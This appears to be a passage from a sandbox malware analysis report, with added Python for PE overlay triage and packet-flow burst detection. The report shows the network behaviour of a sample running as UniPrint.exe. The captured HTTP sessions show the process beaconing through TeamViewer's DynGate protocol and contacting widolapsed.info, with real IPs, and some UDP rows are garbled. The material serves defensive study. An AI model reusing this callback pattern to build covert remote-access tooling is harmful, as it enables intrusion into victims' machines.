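            findings.append(f"certificate table at {info['cert_offset']:#x} lies in the overlay")
        findings.append(f"overlay: {payload:#x} bytes outside any section (excluding the certificate)")
    return findings


def build_sample_pe() -> bytes:
    """Constructed fixture (not the analysed sample): a minimal, non-runnable PE32 with a
    zeroed .text, a uniformly distributed .data, 0x100 bytes of overlay and a dummy
    0x40-byte certificate table referenced from the SECURITY directory."""
    secs = [(b".text", b"\0" * 0x200, 0x60000020), (b".data", bytes(range(256)) * 2, 0xC0000040)]
    hdr_len = (0x40 + 4 + 20 + 224 + 40 * len(secs) + 0x1FF) & ~0x1FF  # FileAlignment 0x200
    overlay, cert = b"A" * 0x100, b"\0" * 0x40
    raw_ptr, va, sec_hdrs = hdr_len, 0x1000, b""
    for name, data, chars in secs:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += len(data)
        va += 0x1000
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_SECURITY] = (raw_ptr + len(overlay), len(cert))
    opt = struct.pack("<HBBIIIIII", 0x10B, 6, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0,
                       va, hdr_len, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", a, s) for a, s in dirs)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x102)
    headers = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + file_hdr + opt + sec_hdrs
    return headers.ljust(hdr_len, b"\0") + b"".join(d for _, d, _ in secs) + overlay + cert


if __name__ == "__main__":
    for line in triage(build_sample_pe()):
        print(line)
```

On the fixture this reports the uniform .data section at 8.00 bits, a certificate table inside the overlay and 0x100 bytes of unsigned-looking overlay payload. Note that Authenticode hashes the whole file except the checksum, the SECURITY directory entry and the certificate table itself, so overlay data before the certificate is still covered by the signature; a valid signature therefore says nothing about what the overlay contains, only that it has not changed since signing.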

Resources

Name           RVA      Size   Type                                                                   Language  Country
RT_ICON        0x441f0  0x568  GLS_BINARY_LSB_FIRST                                                   English   United States
RT_ICON        0x44758  0x468  GLS_BINARY_LSB_FIRST                                                   English   United States
RT_ICON        0x44bc0  0x128  GLS_BINARY_LSB_FIRST                                                   English   United States
RT_DIALOG      0x44ce8  0x202  data                                                                   English   United States
RT_DIALOG      0x44ef0  0xf8   data                                                                   English   United States
RT_DIALOG      0x44fe8  0xee   data                                                                   English   United States
RT_GROUP_ICON  0x450d8  0x30   data                                                                   English   United States
RT_MANIFEST    0x45108  0x2cc  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

Imports

DLL           Imported functions
KERNEL32.DLL: CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
GDI32.dll:    SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
ole32.dll:    CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
SHELL32.dll:  SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
USER32.dll:   EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
VERSION.dll:  GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 15, 2021 14:02:04.126475096 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.147680998 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.147789955 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.163152933 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.184066057 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.184166908 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.214737892 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.235718012 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.235829115 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.241089106 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.262003899 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.262037039 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.262125015 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.262177944 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.266606092 CEST  49761        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.271028042 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.287694931 CEST  80           49761      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.292336941 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.292438030 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.293028116 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.314116955 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.314212084 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.327481985 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.348402023 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.348972082 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.349881887 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.372112036 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.372143030 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.372212887 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.372248888 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.372446060 CEST  49762        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.374186039 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.393234015 CEST  80           49762      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.395155907 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.395279884 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.397053957 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.418442011 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.418550968 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.422777891 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:04.443669081 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:04.443794012 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.181092978 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.202090025 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.202183962 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.202229977 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.202305079 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.265382051 CEST  49763        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.287209034 CEST  80           49763      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.304861069 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.326276064 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.326514006 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.470541954 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.504560947 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.504858017 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.885689974 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:05.909208059 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:05.910654068 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:06.948101997 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:06.972300053 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:06.972657919 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:06.972944975 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:06.972968102 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:07.001065016 CEST  49764        80         192.168.2.4      185.188.32.23
Sep 15, 2021 14:02:07.023164034 CEST  80           49764      185.188.32.23    192.168.2.4
Sep 15, 2021 14:02:07.178396940 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.204675913 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.204793930 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.205918074 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.232043982 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.232136965 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.235219002 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.261502981 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.261630058 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.264987946 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.265146017 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.291261911 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.291311979 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.291441917 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.292916059 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.319358110 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.319458008 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.321544886 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.348187923 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.348217010 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.348237038 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.348290920 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.348319054 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.350502014 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.350652933 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.351424932 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.376756907 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.377854109 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.377979040 CEST  49766        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.381102085 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.381236076 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.381417036 CEST  49765        80         192.168.2.4      188.172.235.146
Sep 15, 2021 14:02:07.407360077 CEST  80           49765      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.407394886 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.407478094 CEST  80           49766      188.172.235.146  192.168.2.4
Sep 15, 2021 14:02:07.407478094 CEST  49766        80         192.168.2.4      188.172.235.146
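
The TCP table lists packets, not connections. Reconstructing flows from it shows the shape a triage analyst actually cares about: four consecutive connections from ephemeral ports 49761 through 49764 to 185.188.32.23:80, each lasting under two seconds, followed by two to 188.172.235.146:80, all plain HTTP. The following Python is an added example, not part of the Joe Sandbox report, that groups packet records into client-to-server flows, summarizes them per server and flags bursts of short connections to one host. The packet list it embeds is constructed from the first and last rows of each connection in the table above, and the 192.168.2.0/24 prefix is assumed to be the sandbox client network.

```python
from collections import defaultdict
from datetime import datetime

LOCAL_PREFIX = "192.168.2."  # sandbox client subnet (assumption taken from the table)

# Constructed sample: first and last packets of each TCP connection, copied from the
# TCP packet table above (client-side ephemeral ports 49761..49766).
PACKETS = [
    ("Sep 15, 2021 14:02:04.126475096 CEST", 49761, 80, "192.168.2.4", "185.188.32.23"),
    ("Sep 15, 2021 14:02:04.147680998 CEST", 80, 49761, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:04.287694931 CEST", 80, 49761, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:04.271028042 CEST", 49762, 80, "192.168.2.4", "185.188.32.23"),
    ("Sep 15, 2021 14:02:04.292336941 CEST", 80, 49762, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:04.393234015 CEST", 80, 49762, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:04.374186039 CEST", 49763, 80, "192.168.2.4", "185.188.32.23"),
    ("Sep 15, 2021 14:02:04.395155907 CEST", 80, 49763, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:05.287209034 CEST", 80, 49763, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:05.304861069 CEST", 49764, 80, "192.168.2.4", "185.188.32.23"),
    ("Sep 15, 2021 14:02:05.326276064 CEST", 80, 49764, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:07.023164034 CEST", 80, 49764, "185.188.32.23", "192.168.2.4"),
    ("Sep 15, 2021 14:02:07.178396940 CEST", 49765, 80, "192.168.2.4", "188.172.235.146"),
    ("Sep 15, 2021 14:02:07.204675913 CEST", 80, 49765, "188.172.235.146", "192.168.2.4"),
    ("Sep 15, 2021 14:02:07.407360077 CEST", 80, 49765, "188.172.235.146", "192.168.2.4"),
    ("Sep 15, 2021 14:02:07.235219002 CEST", 49766, 80, "192.168.2.4", "188.172.235.146"),
    ("Sep 15, 2021 14:02:07.261502981 CEST", 80, 49766, "188.172.235.146", "192.168.2.4"),
    ("Sep 15, 2021 14:02:07.407478094 CEST", 80, 49766, "188.172.235.146", "192.168.2.4"),
]


def parse_ts(s: str) -> datetime:
    """Parse the report's 'Mon DD, YYYY HH:MM:SS.nnnnnnnnn TZ' stamps. Nanoseconds are
    truncated to microseconds because datetime carries no finer resolution."""
    stamp, _zone = s.rsplit(" ", 1)
    return datetime.strptime(stamp[:-3], "%b %d, %Y %H:%M:%S.%f")


def build_flows(packets):
    """Group packets into flows keyed on the local host's side of the connection, so both
    directions of one TCP connection land in the same record."""
    flows = {}
    for ts, sport, dport, src, dst in packets:
        t = parse_ts(ts)
        if src.startswith(LOCAL_PREFIX):
            key, direction = (src, sport, dst, dport), "out"
        else:
            key, direction = (dst, dport, src, sport), "in"
        f = flows.setdefault(key, {"first": t, "last": t, "out": 0, "in": 0})
        f["first"], f["last"] = min(f["first"], t), max(f["last"], t)
        f[direction] += 1
    return flows


def summarize_servers(flows):
    """Per (server, port): distinct connections, packets seen and the active time span."""
    servers = defaultdict(lambda: {"connections": 0, "packets": 0, "first": None, "last": None})
    for (_client, _cport, server, port), f in flows.items():
        s = servers[(server, port)]
        s["connections"] += 1
        s["packets"] += f["out"] + f["in"]
        s["first"] = f["first"] if s["first"] is None else min(s["first"], f["first"])
        s["last"] = f["last"] if s["last"] is None else max(s["last"], f["last"])
    return dict(servers)


def flag_connection_bursts(flows, max_seconds=1.0, min_short=3):
    """Flag (client, server, port) triples with at least `min_short` connections that each
    lasted no longer than `max_seconds`. A run of short plain-HTTP fetches from fresh
    ephemeral ports is the shape a downloader or installer stage leaves in a packet list."""
    per_triple = defaultdict(list)
    for (client, _cport, server, port), f in flows.items():
        per_triple[(client, server, port)].append((f["last"] - f["first"]).total_seconds())
    flagged = []
    for (client, server, port), durations in sorted(per_triple.items()):
        short = sum(1 for d in durations if d <= max_seconds)
        if short >= min_short:
            flagged.append((client, server, port, short, len(durations)))
    return flagged


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    for (server, port), s in summarize_servers(flows).items():
        print(f"{server}:{port}  connections={s['connections']}  packets={s['packets']}  "
              f"{s['first'].time()} -> {s['last'].time()}")
    for client, server, port, short, total in flag_connection_bursts(flows):
        print(f"burst: {client} -> {server}:{port}, {short}/{total} connections under 1 s")
```

On the embedded rows this flags 185.188.32.23:80 (three of four connections under a second) and leaves 188.172.235.146:80 alone with its two connections. Keying flows on the local side rather than on the lower port number is deliberate: it keeps a connection intact even when the sandbox client talks to a server on a high port, and it makes the per-server summary the natural pivot for comparing against the DNS answers in the UDP table and against threat-intel lookups of the destination addresses.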

                                                                                                                  UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 15, 2021 14:01:42.976789951 CEST  62389        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:01:43.013367891 CEST  53           62389      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:03.784799099 CEST  49910        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:03.814250946 CEST  53           49910      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:03.823643923 CEST  55854        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:03.849232912 CEST  53           55854      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:04.040373087 CEST  64549        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:04.073539972 CEST  53           64549      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:08.655509949 CEST  63153        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:08.683300018 CEST  53           63153      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:14.960760117 CEST  52991        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:14.987684965 CEST  53           52991      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:41.364280939 CEST  53700        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:41.389894009 CEST  53           53700      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:42.541956902 CEST  51726        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:42.588336945 CEST  53           51726      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:43.108805895 CEST  56794        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:43.135267973 CEST  53           56794      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:44.925611973 CEST  56534        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:44.952585936 CEST  53           56534      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:45.474016905 CEST  56627        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:45.520349979 CEST  53           56627      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:45.998174906 CEST  56621        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:46.030580044 CEST  53           56621      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:46.504812002 CEST  63116        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:46.532043934 CEST  53           63116      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:47.026256084 CEST  64078        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:47.053766966 CEST  53           64078      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:47.770863056 CEST  64801        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:47.797616959 CEST  53           64801      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:48.652941942 CEST  61721        53         192.168.2.4  8.8.8.8
Sep 15, 2021 14:02:48.695420027 CEST  53           61721      8.8.8.8      192.168.2.4
Sep 15, 2021 14:02:49.482099056 CEST  51255        53         192.168.2.4  8.8.8.8
                                                                                                                  Sep 15, 2021 14:02:49.513088942 CEST53512558.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:52.292789936 CEST6152253192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:52.321297884 CEST53615228.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:03:30.976747036 CEST5233753192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:03:31.009324074 CEST53523378.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:03:32.799874067 CEST5504653192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:03:32.832097054 CEST53550468.8.8.8192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 14:02:03.784799099 CEST | 192.168.2.4 | 8.8.8.8 | 0xbed1 | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:03.823643923 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb8b | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:04.040373087 CEST | 192.168.2.4 | 8.8.8.8 | 0x4123 | Standard query (0) | master13.teamviewer.com | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:08.655509949 CEST | 192.168.2.4 | 8.8.8.8 | 0x9803 | Standard query (0) | widolapsed.info | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 14:02:03.814250946 CEST | 8.8.8.8 | 192.168.2.4 | 0xbed1 | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:03.849232912 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb8b | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:04.073539972 CEST | 8.8.8.8 | 192.168.2.4 | 0x4123 | No error (0) | master13.teamviewer.com |  | 185.188.32.23 | A (IP address) | IN (0x0001)
Sep 15, 2021 14:02:08.683300018 CEST | 8.8.8.8 | 192.168.2.4 | 0x9803 | No error (0) | widolapsed.info |  | 45.153.241.148 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• widolapsed.info
• master13.teamviewer.com
• 188.172.235.146

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49767 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49838 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49843 | 45.153.241.148 | 443 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49761 | 185.188.32.23 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:04.163152933 CEST | 1208 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.184066057 CEST | 1208 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 34 32 30 34 37 31 34 35
    Data Ascii: $42047145
Sep 15, 2021 14:02:04.214737892 CEST | 1208 | OUT | GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.235718012 CEST | 1208 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:02:04.241089106 CEST | 1209 | OUT | GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.262003899 CEST | 1209 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 16
    Data Raw: 17 24 13 0b 00 18 20 19 9c 98 98 1a 9b 9a 1a 9c
    Data Ascii: $


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.4 | 49762 | 185.188.32.23 | 80 | C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:02:04.293028116 CEST | 1210 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master13.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:02:04.314116955 CEST | 1210 | IN | HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 34 32 30 34 37 31 35 32
    Data Ascii: $42047152
